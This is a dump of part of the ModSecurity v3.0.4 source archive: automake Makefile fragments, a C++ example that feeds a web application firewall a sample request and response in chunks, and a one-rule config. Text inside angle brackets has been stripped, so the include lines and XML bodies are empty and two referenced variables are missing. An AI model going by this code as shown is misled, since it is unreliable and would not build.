@LMDB_DISPLAY@ LMDB_FOUND = @LMDB_FOUND@ LMDB_LDADD = @LMDB_LDADD@ LMDB_LDFLAGS = @LMDB_LDFLAGS@ LMDB_LIBS = @LMDB_LIBS@ LMDB_VERSION = @LMDB_VERSION@ LN_S = @LN_S@ LTLIBOBJS = @LTLIBOBJS@ LT_SYS_LIBRARY_PATH = @LT_SYS_LIBRARY_PATH@ LUA_CFLAGS = @LUA_CFLAGS@ LUA_DISPLAY = @LUA_DISPLAY@ LUA_FOUND = @LUA_FOUND@ LUA_LDADD = @LUA_LDADD@ LUA_LDFLAGS = @LUA_LDFLAGS@ MAKEINFO = @MAKEINFO@ MANIFEST_TOOL = @MANIFEST_TOOL@ MAXMIND_CFLAGS = @MAXMIND_CFLAGS@ MAXMIND_DISPLAY = @MAXMIND_DISPLAY@ MAXMIND_FOUND = @MAXMIND_FOUND@ MAXMIND_LDADD = @MAXMIND_LDADD@ MAXMIND_LDFLAGS = @MAXMIND_LDFLAGS@ MAXMIND_LIBS = @MAXMIND_LIBS@ MAXMIND_VERSION = @MAXMIND_VERSION@ MKDIR_P = @MKDIR_P@ MODSEC_MUTEX_ON_PM = @MODSEC_MUTEX_ON_PM@ MODSEC_NO_LOGS = @MODSEC_NO_LOGS@ MSC_BASE_DIR = @MSC_BASE_DIR@ MSC_GIT_VERSION = @MSC_GIT_VERSION@ MSC_VERSION = @MSC_VERSION@ MSC_VERSION_INFO = @MSC_VERSION_INFO@ MSC_VERSION_WITH_PATCHLEVEL = @MSC_VERSION_WITH_PATCHLEVEL@ NM = @NM@ NMEDIT = @NMEDIT@ OBJDUMP = @OBJDUMP@ OBJEXT = @OBJEXT@ OTOOL = @OTOOL@ OTOOL64 = @OTOOL64@ PACKAGE = @PACKAGE@ PACKAGE_BUGREPORT = @PACKAGE_BUGREPORT@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_STRING = @PACKAGE_STRING@ PACKAGE_TARNAME = @PACKAGE_TARNAME@ PACKAGE_URL = @PACKAGE_URL@ PACKAGE_VERSION = @PACKAGE_VERSION@ PATH_SEPARATOR = @PATH_SEPARATOR@ PCRE_CFLAGS = @PCRE_CFLAGS@ PCRE_CONFIG = @PCRE_CONFIG@ PCRE_CPPFLAGS = @PCRE_CPPFLAGS@ PCRE_LDADD = @PCRE_LDADD@ PCRE_LDFLAGS = @PCRE_LDFLAGS@ PCRE_LD_PATH = @PCRE_LD_PATH@ PCRE_VERSION = @PCRE_VERSION@ PKG_CONFIG = @PKG_CONFIG@ PKG_CONFIG_LIBDIR = @PKG_CONFIG_LIBDIR@ PKG_CONFIG_PATH = @PKG_CONFIG_PATH@ RANLIB = @RANLIB@ SED = @SED@ SET_MAKE = @SET_MAKE@ SHELL = @SHELL@ SSDEEP_CFLAGS = @SSDEEP_CFLAGS@ SSDEEP_DISPLAY = @SSDEEP_DISPLAY@ SSDEEP_FOUND = @SSDEEP_FOUND@ SSDEEP_LDADD = @SSDEEP_LDADD@ SSDEEP_LDFLAGS = @SSDEEP_LDFLAGS@ STRIP = @STRIP@ VALGRIND = @VALGRIND@ VALGRIND_ENABLED = @VALGRIND_ENABLED@ VERSION = @VERSION@ YACC = @YACC@ YACC_INST = @YACC_INST@ YAJL_CFLAGS = @YAJL_CFLAGS@ YAJL_DISPLAY = @YAJL_DISPLAY@ YAJL_FOUND = @YAJL_FOUND@ YAJL_LDADD = @YAJL_LDADD@ YAJL_LDFLAGS = @YAJL_LDFLAGS@ YAJL_LIBS = @YAJL_LIBS@ YAJL_VERSION = @YAJL_VERSION@ YFLAGS = @YFLAGS@ abs_builddir = @abs_builddir@ abs_srcdir = @abs_srcdir@ abs_top_builddir = @abs_top_builddir@ abs_top_srcdir = @abs_top_srcdir@ ac_ct_AR = @ac_ct_AR@ ac_ct_CC = @ac_ct_CC@ ac_ct_CXX = @ac_ct_CXX@ ac_ct_DUMPBIN = @ac_ct_DUMPBIN@ am__include = @am__include@ am__leading_dot = @am__leading_dot@ am__quote = @am__quote@ am__tar = @am__tar@ am__untar = @am__untar@ bindir = @bindir@ build = @build@ build_alias = @build_alias@ build_cpu = @build_cpu@ build_os = @build_os@ build_vendor = @build_vendor@ builddir = @builddir@ datadir = @datadir@ datarootdir = @datarootdir@ docdir = @docdir@ dvidir = @dvidir@ exec_prefix = @exec_prefix@ host = @host@ host_alias = @host_alias@ host_cpu = @host_cpu@ host_os = @host_os@ host_vendor = @host_vendor@ htmldir = @htmldir@ includedir = @includedir@ infodir = @infodir@ install_sh = @install_sh@ libdir = @libdir@ libexecdir = @libexecdir@ localedir = @localedir@ localstatedir = @localstatedir@ mandir = @mandir@ mkdir_p = @mkdir_p@ oldincludedir = @oldincludedir@ pdfdir = @pdfdir@ prefix = @prefix@ program_transform_name = @program_transform_name@ psdir = @psdir@ sbindir = @sbindir@ sharedstatedir = @sharedstatedir@ srcdir = @srcdir@ sysconfdir = @sysconfdir@ target_alias = @target_alias@ top_build_prefix = @top_build_prefix@ top_builddir = @top_builddir@ top_srcdir = @top_srcdir@ valgrind_enabled_tools = @valgrind_enabled_tools@ valgrind_tools = @valgrind_tools@ simple_request_SOURCES = \ simple_request.cc simple_request_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) simple_request_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(LMDB_LDFLAGS) \ -lpthread \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) simple_request_CPPFLAGS = \ $(GLOBAL_CFLAGS) \ -std=c++11 \ -I$(top_builddir)/headers \ -I$(top_builddir) \ -g \ -I../others \ -fPIC \ -O3 \ $(GEOIP_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(MODSEC_NO_LOGS) \ $(YAJL_CFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(PCRE_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in all: all-am .SUFFIXES: .SUFFIXES: .cc .lo .o .obj $(srcdir)/Makefile.in: $(srcdir)/Makefile.am $(am__configure_deps) @for dep in $?; do \ case '$(am__configure_deps)' in \ *$$dep*) \ ( cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh ) \ && { if test -f $@; then exit 0; else break; fi; }; \ exit 1;; \ esac; \ done; \ echo ' cd $(top_srcdir) && $(AUTOMAKE) --foreign examples/using_bodies_in_chunks/Makefile'; \ $(am__cd) $(top_srcdir) && \ $(AUTOMAKE) --foreign examples/using_bodies_in_chunks/Makefile Makefile: $(srcdir)/Makefile.in $(top_builddir)/config.status @case '$?' in \ *config.status*) \ cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh;; \ *) \ echo ' cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles)'; \ cd $(top_builddir) && $(SHELL) ./config.status $(subdir)/$@ $(am__maybe_remake_depfiles);; \ esac; $(top_builddir)/config.status: $(top_srcdir)/configure $(CONFIG_STATUS_DEPENDENCIES) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(top_srcdir)/configure: $(am__configure_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(ACLOCAL_M4): $(am__aclocal_m4_deps) cd $(top_builddir) && $(MAKE) $(AM_MAKEFLAGS) am--refresh $(am__aclocal_m4_deps): clean-noinstPROGRAMS: @list='$(noinst_PROGRAMS)'; test -n "$$list" || exit 0; \ echo " rm -f" $$list; \ rm -f $$list || exit $$?; \ test -n "$(EXEEXT)" || exit 0; \ list=`for p in $$list; do echo "$$p"; done | sed 's/$(EXEEXT)$$//'`; \ echo " rm -f" $$list; \ rm -f $$list simple_request$(EXEEXT): $(simple_request_OBJECTS) $(simple_request_DEPENDENCIES) $(EXTRA_simple_request_DEPENDENCIES) @rm -f simple_request$(EXEEXT) $(AM_V_CXXLD)$(simple_request_LINK) $(simple_request_OBJECTS) $(simple_request_LDADD) $(LIBS) mostlyclean-compile: -rm -f *.$(OBJEXT) distclean-compile: -rm -f *.tab.c @AMDEP_TRUE@@am__include@ @am__quote@./$(DEPDIR)/simple_request-simple_request.Po@am__quote@ # am--include-marker $(am__depfiles_remade): @$(MKDIR_P) $(@D) @echo '# dummy' >$@-t && $(am__mv) $@-t $@ am--depfiles: $(am__depfiles_remade) .cc.o: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.o$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ $< .cc.obj: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.obj$$||'`;\ @am__fastdepCXX_TRUE@ $(CXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ `$(CYGPATH_W) '$<'` &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXXCOMPILE) -c -o $@ `$(CYGPATH_W) '$<'` .cc.lo: @am__fastdepCXX_TRUE@ $(AM_V_CXX)depbase=`echo $@ | sed 's|[^/]*$$|$(DEPDIR)/&|;s|\.lo$$||'`;\ @am__fastdepCXX_TRUE@ $(LTCXXCOMPILE) -MT $@ -MD -MP -MF $$depbase.Tpo -c -o $@ $< &&\ @am__fastdepCXX_TRUE@ $(am__mv) $$depbase.Tpo $$depbase.Plo @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='$<' object='$@' libtool=yes @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(LTCXXCOMPILE) -c -o $@ $< simple_request-simple_request.o: simple_request.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT simple_request-simple_request.o -MD -MP -MF $(DEPDIR)/simple_request-simple_request.Tpo -c -o simple_request-simple_request.o `test -f 'simple_request.cc' || echo '$(srcdir)/'`simple_request.cc @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/simple_request-simple_request.Tpo $(DEPDIR)/simple_request-simple_request.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='simple_request.cc' object='simple_request-simple_request.o' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o simple_request-simple_request.o `test -f 'simple_request.cc' || echo '$(srcdir)/'`simple_request.cc simple_request-simple_request.obj: simple_request.cc @am__fastdepCXX_TRUE@ $(AM_V_CXX)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -MT simple_request-simple_request.obj -MD -MP -MF $(DEPDIR)/simple_request-simple_request.Tpo -c -o simple_request-simple_request.obj `if test -f 'simple_request.cc'; then $(CYGPATH_W) 'simple_request.cc'; else $(CYGPATH_W) '$(srcdir)/simple_request.cc'; fi` @am__fastdepCXX_TRUE@ $(AM_V_at)$(am__mv) $(DEPDIR)/simple_request-simple_request.Tpo $(DEPDIR)/simple_request-simple_request.Po @AMDEP_TRUE@@am__fastdepCXX_FALSE@ $(AM_V_CXX)source='simple_request.cc' object='simple_request-simple_request.obj' libtool=no @AMDEPBACKSLASH@ @AMDEP_TRUE@@am__fastdepCXX_FALSE@ DEPDIR=$(DEPDIR) $(CXXDEPMODE) $(depcomp) @AMDEPBACKSLASH@ @am__fastdepCXX_FALSE@ $(AM_V_CXX@am__nodep@)$(CXX) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(simple_request_CPPFLAGS) $(CPPFLAGS) $(AM_CXXFLAGS) $(CXXFLAGS) -c -o simple_request-simple_request.obj `if test -f 'simple_request.cc'; then $(CYGPATH_W) 'simple_request.cc'; else $(CYGPATH_W) '$(srcdir)/simple_request.cc'; fi` mostlyclean-libtool: -rm -f *.lo clean-libtool: -rm -rf .libs _libs ID: $(am__tagged_files) $(am__define_uniq_tagged_files); mkid -fID $$unique tags: tags-am TAGS: tags tags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) set x; \ here=`pwd`; \ $(am__define_uniq_tagged_files); \ shift; \ if test -z "$(ETAGS_ARGS)$$*$$unique"; then :; else \ test -n "$$unique" || unique=$$empty_fix; \ if test $$# -gt 0; then \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ "$$@" $$unique; \ else \ $(ETAGS) $(ETAGSFLAGS) $(AM_ETAGSFLAGS) $(ETAGS_ARGS) \ $$unique; \ fi; \ fi ctags: ctags-am CTAGS: ctags ctags-am: $(TAGS_DEPENDENCIES) $(am__tagged_files) $(am__define_uniq_tagged_files); \ test -z "$(CTAGS_ARGS)$$unique" \ || $(CTAGS) $(CTAGSFLAGS) $(AM_CTAGSFLAGS) $(CTAGS_ARGS) \ $$unique GTAGS: here=`$(am__cd) $(top_builddir) && pwd` \ && $(am__cd) $(top_srcdir) \ && gtags -i $(GTAGS_ARGS) "$$here" cscopelist: cscopelist-am cscopelist-am: $(am__tagged_files) list='$(am__tagged_files)'; \ case "$(srcdir)" in \ [\\/]* | ?:[\\/]*) sdir="$(srcdir)" ;; \ *) sdir=$(subdir)/$(srcdir) ;; \ esac; \ for i in $$list; do \ if test -f "$$i"; then \ echo "$(subdir)/$$i"; \ else \ echo "$$sdir/$$i"; \ fi; \ done >> $(top_builddir)/cscope.files distclean-tags: -rm -f TAGS ID GTAGS GRTAGS GSYMS GPATH tags distdir: $(BUILT_SOURCES) $(MAKE) $(AM_MAKEFLAGS) distdir-am distdir-am: $(DISTFILES) @srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \ list='$(DISTFILES)'; \ dist_files=`for file in $$list; do echo $$file; done | \ sed -e "s|^$$srcdirstrip/||;t" \ -e "s|^$$topsrcdirstrip/|$(top_builddir)/|;t"`; \ case $$dist_files in \ */*) $(MKDIR_P) `echo "$$dist_files" | \ sed '/\//!d;s|^|$(distdir)/|;s,/[^/]*$$,,' | \ sort -u` ;; \ esac; \ for file in $$dist_files; do \ if test -f $$file || test -d $$file; then d=.; else d=$(srcdir); fi; \ if test -d $$d/$$file; then \ dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \ if test -d "$(distdir)/$$file"; then \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \ cp -fpR $(srcdir)/$$file "$(distdir)$$dir" || exit 1; \ find "$(distdir)/$$file" -type d ! -perm -700 -exec chmod u+rwx {} \;; \ fi; \ cp -fpR $$d/$$file "$(distdir)$$dir" || exit 1; \ else \ test -f "$(distdir)/$$file" \ || cp -p $$d/$$file "$(distdir)/$$file" \ || exit 1; \ fi; \ done check-am: all-am check: check-am all-am: Makefile $(PROGRAMS) installdirs: install: install-am install-exec: install-exec-am install-data: install-data-am uninstall: uninstall-am install-am: all-am @$(MAKE) $(AM_MAKEFLAGS) install-exec-am install-data-am installcheck: installcheck-am install-strip: if test -z '$(STRIP)'; then \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ install; \ else \ $(MAKE) $(AM_MAKEFLAGS) INSTALL_PROGRAM="$(INSTALL_STRIP_PROGRAM)" \ install_sh_PROGRAM="$(INSTALL_STRIP_PROGRAM)" INSTALL_STRIP_FLAG=-s \ "INSTALL_PROGRAM_ENV=STRIPPROG='$(STRIP)'" install; \ fi mostlyclean-generic: clean-generic: distclean-generic: -test -z "$(CONFIG_CLEAN_FILES)" || rm -f $(CONFIG_CLEAN_FILES) -test . = "$(srcdir)" || test -z "$(CONFIG_CLEAN_VPATH_FILES)" || rm -f $(CONFIG_CLEAN_VPATH_FILES) maintainer-clean-generic: @echo "This command is intended for maintainers to use" @echo "it deletes files that may require special tools to rebuild." -test -z "$(MAINTAINERCLEANFILES)" || rm -f $(MAINTAINERCLEANFILES) clean: clean-am clean-am: clean-generic clean-libtool clean-noinstPROGRAMS \ mostlyclean-am distclean: distclean-am -rm -f ./$(DEPDIR)/simple_request-simple_request.Po -rm -f Makefile distclean-am: clean-am distclean-compile distclean-generic \ distclean-tags dvi: dvi-am dvi-am: html: html-am html-am: info: info-am info-am: install-data-am: install-dvi: install-dvi-am install-dvi-am: install-exec-am: install-html: install-html-am install-html-am: install-info: install-info-am install-info-am: install-man: install-pdf: install-pdf-am install-pdf-am: install-ps: install-ps-am install-ps-am: installcheck-am: maintainer-clean: maintainer-clean-am -rm -f ./$(DEPDIR)/simple_request-simple_request.Po -rm -f Makefile maintainer-clean-am: distclean-am maintainer-clean-generic mostlyclean: mostlyclean-am mostlyclean-am: mostlyclean-compile mostlyclean-generic \ mostlyclean-libtool pdf: pdf-am pdf-am: ps: ps-am ps-am: uninstall-am: .MAKE: install-am install-strip .PHONY: CTAGS GTAGS TAGS all all-am am--depfiles check check-am clean \ clean-generic clean-libtool clean-noinstPROGRAMS cscopelist-am \ ctags ctags-am distclean distclean-compile distclean-generic \ distclean-libtool distclean-tags distdir dvi dvi-am html \ html-am info info-am install install-am install-data \ install-data-am install-dvi install-dvi-am install-exec \ install-exec-am install-html install-html-am install-info \ install-info-am install-man install-pdf install-pdf-am \ install-ps install-ps-am install-strip installcheck \ installcheck-am installdirs maintainer-clean \ maintainer-clean-generic mostlyclean mostlyclean-compile \ mostlyclean-generic mostlyclean-libtool pdf pdf-am ps ps-am \ tags tags-am uninstall uninstall-am .PRECIOUS: Makefile # Tell versions [3.59,3.63) of GNU make to not export all variables. # Otherwise a system limit (for SysV at least) may be exceeded. .NOEXPORT: modsecurity-v3.0.4/examples/using_bodies_in_chunks/simple_request.cc0000644000175000017500000002004413607066010026405 0ustar zimmerlezimmerle/* * ModSecurity, http://www.modsecurity.org/ * Copyright (c) 2015 Trustwave Holdings, Inc. (http://www.trustwave.com/) * * You may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * If any of the files related to licensing are missing or if you have any * other questions related to licensing please contact Trustwave Holdings, Inc. * directly using the email address security@modsecurity.org. * */ #include #include #include #include #include #include #include #include char request_uri[] = "/test.pl?param1=test¶2=test2"; char request_body_first[] = "" \ "\n\r" \ "\n\r" \ " \n\r" \ " \n\r" \ " string\n\r"; char request_body_third[] = "" \ " \n\r" \ " \n\r" \ "\n\r"; char response_body_first[] = "" \ "\n\r" \ "\n\r" \ " \n\r" \ " \n\r" \ " string\n\r"; char response_body_third[] = "" \ " \n\r" \ " \n\r" \ "\n\r"; char ip[] = "200.249.12.31"; static void logCb(void *data, const void *ruleMessagev) { if (ruleMessagev == NULL) { std::cout << "I've got a call but the message was null ;("; std::cout << std::endl; return; } const modsecurity::RuleMessage *ruleMessage = \ reinterpret_cast(ruleMessagev); std::cout << "Rule Id: " << std::to_string(ruleMessage->m_ruleId); std::cout << " phase: " << std::to_string(ruleMessage->m_phase); std::cout << std::endl; if (ruleMessage->m_isDisruptive) { std::cout << " * Disruptive action: "; std::cout << modsecurity::RuleMessage::log(ruleMessage); std::cout << std::endl; std::cout << " ** %d is meant to be informed by the webserver."; std::cout << std::endl; } else { std::cout << " * Match, but no disruptive action: "; std::cout << modsecurity::RuleMessage::log(ruleMessage); std::cout << std::endl; } } int process_intervention(modsecurity::Transaction *transaction) { modsecurity::ModSecurityIntervention intervention; intervention.status = 200; intervention.url = NULL; intervention.log = NULL; intervention.disruptive = 0; if (msc_intervention(transaction, &intervention) == 0) { return 0; } if (intervention.log == NULL) { intervention.log = strdup("(no log message was specified)"); } std::cout << "Log: " << intervention.log << std::endl; free(intervention.log); intervention.log = NULL; if (intervention.url != NULL) { std::cout << "Intervention, redirect to: " << intervention.url; std::cout << " with status code: " << intervention.status << std::endl; free(intervention.url); intervention.url = NULL; return intervention.status; } if (intervention.status != 200) { std::cout << "Intervention, returning code: " << intervention.status; std::cout << std::endl; return intervention.status; } return 0; } int main(int argc, char **argv) { modsecurity::ModSecurity *modsec; modsecurity::Rules *rules; modsecurity::ModSecurityIntervention it; if (argc < 2) { std::cout << "Use " << *argv << " test-case-file.conf"; std::cout << std::endl << std::endl; return -1; } *(argv++); std::string rules_arg(*argv); /** * ModSecurity initial setup * */ modsec = new modsecurity::ModSecurity(); modsec->setConnectorInformation("ModSecurity-test v0.0.1-alpha" \ " (ModSecurity test)"); modsec->setServerLogCb(logCb, modsecurity::RuleMessageLogProperty | modsecurity::IncludeFullHighlightLogProperty); /** * loading the rules.... * */ rules = new modsecurity::Rules(); if (rules->loadFromUri(rules_arg.c_str()) < 0) { std::cout << "Problems loading the rules..." << std::endl; std::cout << rules->m_parserError.str() << std::endl; return -1; } /** * We are going to have a transaction * */ modsecurity::Transaction *modsecTransaction = \ new modsecurity::Transaction(modsec, rules, NULL); process_intervention(modsecTransaction); /** * Initial connection setup * */ modsecTransaction->processConnection(ip, 12345, "127.0.0.1", 80); process_intervention(modsecTransaction); /** * Finally we've got the URI * */ modsecTransaction->processURI(request_uri, "GET", "1.1"); process_intervention(modsecTransaction); /** * Lets add our request headers. * */ modsecTransaction->addRequestHeader("Host", "net.tutsplus.com"); process_intervention(modsecTransaction); /** * No other reuqest header to add, let process it. * */ modsecTransaction->processRequestHeaders(); process_intervention(modsecTransaction); /** * There is a request body to be informed... * */ modsecTransaction->appendRequestBody( (const unsigned char*)request_body_first, strlen((const char*)request_body_first)); process_intervention(modsecTransaction); modsecTransaction->appendRequestBody( (const unsigned char*)request_body_second, strlen((const char*)request_body_second)); process_intervention(modsecTransaction); modsecTransaction->appendRequestBody( (const unsigned char*)request_body_third, strlen((const char*)request_body_third)); process_intervention(modsecTransaction); /** * Request body is there ;) lets process it. * */ modsecTransaction->processRequestBody(); process_intervention(modsecTransaction); /** * The webserver is giving back the response headers. */ modsecTransaction->addResponseHeader("HTTP/1.1", "200 OK"); process_intervention(modsecTransaction); /** * The response headers are filled in, lets process. * */ modsecTransaction->processResponseHeaders(200, "HTTP 1.2"); process_intervention(modsecTransaction); /** * It is time to let modsec aware of the response body * */ modsecTransaction->appendResponseBody( (const unsigned char*)response_body_first, strlen((const char*)response_body_first)); process_intervention(modsecTransaction); modsecTransaction->appendResponseBody( (const unsigned char*)response_body_second, strlen((const char*)response_body_second)); process_intervention(modsecTransaction); modsecTransaction->appendResponseBody( (const unsigned char*)response_body_third, strlen((const char*)response_body_third)); process_intervention(modsecTransaction); /** * Finally, lets have the response body processed. * */ modsecTransaction->processResponseBody(); process_intervention(modsecTransaction); /** * Keeping track of everything: saving the logs. * */ modsecTransaction->processLogging(); process_intervention(modsecTransaction); /** * cleanup. */ delete modsecTransaction; delete rules; delete modsec; } modsecurity-v3.0.4/examples/using_bodies_in_chunks/example.conf0000644000175000017500000000014213607066010025334 0ustar zimmerlezimmerleSecDebugLog /dev/stdout SecDebugLogLevel 9 SecRule RESPONSE_BODY "/soap:Body" "id:1,phase:5,deny" modsecurity-v3.0.4/examples/using_bodies_in_chunks/Makefile.am0000644000175000017500000000152613607066010025075 0ustar zimmerlezimmerle noinst_PROGRAMS = simple_request simple_request_SOURCES = \ simple_request.cc simple_request_LDADD = \ $(top_builddir)/src/.libs/libmodsecurity.a \ $(CURL_LDADD) \ $(GEOIP_LDADD) \ $(MAXMIND_LDADD) \ $(GLOBAL_LDADD) \ $(LIBXML2_LDADD) \ $(LMDB_LDADD) \ $(LUA_LDADD) \ $(PCRE_LDADD) \ $(SSDEEP_LDADD) \ $(YAJL_LDADD) simple_request_LDFLAGS = \ $(GEOIP_LDFLAGS) \ $(MAXMIND_LDFLAGS) \ $(LMDB_LDFLAGS) \ -lpthread \ $(LUA_LDFLAGS) \ $(SSDEEP_LDFLAGS) \ $(YAJL_LDFLAGS) simple_request_CPPFLAGS = \ $(GLOBAL_CFLAGS) \ -std=c++11 \ -I$(top_builddir)/headers \ -I$(top_builddir) \ -g \ -I../others \ -fPIC \ -O3 \ $(GEOIP_CFLAGS) \ $(MAXMIND_CFLAGS) \ $(GLOBAL_CPPFLAGS) \ $(MODSEC_NO_LOGS) \ $(YAJL_CFLAGS) \ $(LMDB_CFLAGS) \ $(LUA_CFLAGS) \ $(PCRE_CFLAGS) \ $(LIBXML2_CFLAGS) MAINTAINERCLEANFILES = \ Makefile.in modsecurity-v3.0.4/examples/simple_example_using_c/0000755000175000017500000000000013607066346023051 5ustar zimmerlezimmerlemodsecurity-v3.0.4/examples/simple_example_using_c/Makefile.in0000644000175000017500000005706613607066346025134 0ustar zimmerlezimmerle# Makefile.in generated by automake 1.16.1 from Makefile.am. # @configure_input@ # Copyright (C) 1994-2018 Free Software Foundation, Inc. # This Makefile.in is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY, to the extent permitted by law; without # even the implied warranty of MERCHANTABILITY or FITNESS FOR A # PARTICULAR PURPOSE. @SET_MAKE@ VPATH = @srcdir@ am__is_gnu_make = { \ if test -z '$(MAKELEVEL)'; then \ false; \ elif test -n '$(MAKE_HOST)'; then \ true; \ elif test -n '$(MAKE_VERSION)' && test -n '$(CURDIR)'; then \ true; \ else \ false; \ fi; \ } am__make_running_with_option = \ case $${target_option-} in \ ?) ;; \ *) echo "am__make_running_with_option: internal error: invalid" \ "target option '$${target_option-}' specified" >&2; \ exit 1;; \ esac; \ has_opt=no; \ sane_makeflags=$$MAKEFLAGS; \ if $(am__is_gnu_make); then \ sane_makeflags=$$MFLAGS; \ else \ case $$MAKEFLAGS in \ *\\[\ \ ]*) \ bs=\\; \ sane_makeflags=`printf '%s\n' "$$MAKEFLAGS" \ | sed "s/$$bs$$bs[$$bs $$bs ]*//g"`;; \ esac; \ fi; \ skip_next=no; \ strip_trailopt () \ { \ flg=`printf '%s\n' "$$flg" | sed "s/$$1.*$$//"`; \ }; \ for flg in $$sane_makeflags; do \ test $$skip_next = yes && { skip_next=no; continue; }; \ case $$flg in \ *=*|--*) continue;; \ -*I) strip_trailopt 'I'; skip_next=yes;; \ -*I?*) strip_trailopt 'I';; \ -*O) strip_trailopt 'O'; skip_next=yes;; \ -*O?*) strip_trailopt 'O';; \ -*l) strip_trailopt 'l'; skip_next=yes;; \ -*l?*) strip_trailopt 'l';; \ -[dEDm]) skip_next=yes;; \ -[JT]) skip_next=yes;; \ esac; \ case $$flg in \ *$$target_option*) has_opt=yes; break;; \ esac; \ done; \ test $$has_opt = yes am__make_dryrun = (target_option=n; $(am__make_running_with_option)) am__make_keepgoing = (target_option=k; $(am__make_running_with_option)) pkgdatadir = $(datadir)/@PACKAGE@ pkgincludedir = $(includedir)/@PACKAGE@ pkglibdir = $(libdir)/@PACKAGE@ pkglibexecdir = $(libexecdir)/@PACKAGE@ am__cd = CDPATH="$${ZSH_VERSION+.}$(PATH_SEPARATOR)" && cd install_sh_DATA = $(install_sh) -c -m 644 install_sh_PROGRAM = $(install_sh) -c install_sh_SCRIPT = $(install_sh) -c INSTALL_HEADER = $(INSTALL_DATA) transform = $(program_transform_name) NORMAL_INSTALL = : PRE_INSTALL = : POST_INSTALL = : NORMAL_UNINSTALL = : PRE_UNINSTALL = : POST_UNINSTALL = : build_triplet = @build@ host_triplet = @host@ noinst_PROGRAMS = test$(EXEEXT) subdir = examples/simple_example_using_c ACLOCAL_M4 = $(top_srcdir)/aclocal.m4 